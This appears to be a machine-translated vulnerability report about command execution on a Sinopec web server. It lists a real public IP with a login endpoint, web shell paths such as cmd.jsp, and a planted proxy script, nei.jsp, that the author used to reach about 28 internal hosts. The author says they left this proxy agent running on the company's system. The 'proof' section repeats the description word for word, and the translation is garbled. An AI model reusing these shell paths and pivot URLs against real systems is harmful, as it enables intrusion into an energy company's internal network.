Energy security: an intranet roaming caused by command execution by SINOPEC
The execution of commands on a certain station of Sinopec caused Intranet roaming!
Detailed description:
Http: // 61.50.187.141/login! Login1.action
Http: // 61.50.187.141/one8.jsp small
Http: // 61.50.187.141/cmd. jsp
I don't know if most machines on the Intranet are using this password. I am afraid I can look at it as a proxy.
I hung up the little script agent ~!
http://61.50.187.141/nei.jsp?http://10.101.240.11:80http://61.50.187.141/nei.jsp?http://10.101.240.16:80http://61.50.187.141/nei.jsp?http://10.101.240.21:80http://61.50.187.141/nei.jsp?http://10.101.240.22:80http://61.50.187.141/nei.jsp?http://10.101.240.25:80http://61.50.187.141/nei.jsp?http://10.101.240.30:80http://61.50.187.141/nei.jsp?http://10.101.240.33:80http://61.50.187.141/nei.jsp?http://10.101.240.35:80http://61.50.187.141/nei.jsp?http://10.101.240.36:80http://61.50.187.141/nei.jsp?http://10.101.240.37:80http://61.50.187.141/nei.jsp?http://10.101.240.39:80http://61.50.187.141/nei.jsp?http://10.101.240.40:80http://61.50.187.141/nei.jsp?http://10.101.240.50:80http://61.50.187.141/nei.jsp?http://10.101.240.51:80http://61.50.187.141/nei.jsp?http://10.101.240.55:80http://61.50.187.141/nei.jsp?http://10.101.240.71:80http://61.50.187.141/nei.jsp?http://10.101.240.80:80http://61.50.187.141/nei.jsp?http://10.101.240.87:80http://61.50.187.141/nei.jsp?http://10.101.240.90:80http://61.50.187.141/nei.jsp?http://10.101.240.96:80http://61.50.187.141/nei.jsp?http://10.101.240.103:80http://61.50.187.141/nei.jsp?http://10.101.240.104:80http://61.50.187.141/nei.jsp?http://10.101.240.113:80http://61.50.187.141/nei.jsp?http://10.101.240.114:80http://61.50.187.141/nei.jsp?http://10.101.240.120:80http://61.50.187.141/nei.jsp?http://10.101.240.121:80http://61.50.187.141/nei.jsp?http://10.101.240.122:80http://61.50.187.141/nei.jsp?http://10.101.240.138:80
Proof of vulnerability:
Http: // 61.50.187.141/login! Login1.action
Http: // 61.50.187.141/one8.jsp small
Http: // 61.50.187.141/cmd. jsp
I don't know if most machines on the Intranet are using this password. I am afraid I can look at it as a proxy.
I hung up the little script agent ~!
http://61.50.187.141/nei.jsp?http://10.101.240.11:80http://61.50.187.141/nei.jsp?http://10.101.240.16:80http://61.50.187.141/nei.jsp?http://10.101.240.21:80http://61.50.187.141/nei.jsp?http://10.101.240.22:80http://61.50.187.141/nei.jsp?http://10.101.240.25:80http://61.50.187.141/nei.jsp?http://10.101.240.30:80http://61.50.187.141/nei.jsp?http://10.101.240.33:80http://61.50.187.141/nei.jsp?http://10.101.240.35:80http://61.50.187.141/nei.jsp?http://10.101.240.36:80http://61.50.187.141/nei.jsp?http://10.101.240.37:80http://61.50.187.141/nei.jsp?http://10.101.240.39:80http://61.50.187.141/nei.jsp?http://10.101.240.40:80http://61.50.187.141/nei.jsp?http://10.101.240.50:80http://61.50.187.141/nei.jsp?http://10.101.240.51:80http://61.50.187.141/nei.jsp?http://10.101.240.55:80http://61.50.187.141/nei.jsp?http://10.101.240.71:80http://61.50.187.141/nei.jsp?http://10.101.240.80:80http://61.50.187.141/nei.jsp?http://10.101.240.87:80http://61.50.187.141/nei.jsp?http://10.101.240.90:80http://61.50.187.141/nei.jsp?http://10.101.240.96:80http://61.50.187.141/nei.jsp?http://10.101.240.103:80http://61.50.187.141/nei.jsp?http://10.101.240.104:80http://61.50.187.141/nei.jsp?http://10.101.240.113:80http://61.50.187.141/nei.jsp?http://10.101.240.114:80http://61.50.187.141/nei.jsp?http://10.101.240.120:80http://61.50.187.141/nei.jsp?http://10.101.240.121:80http://61.50.187.141/nei.jsp?http://10.101.240.122:80http://61.50.187.141/nei.jsp?http://10.101.240.138:80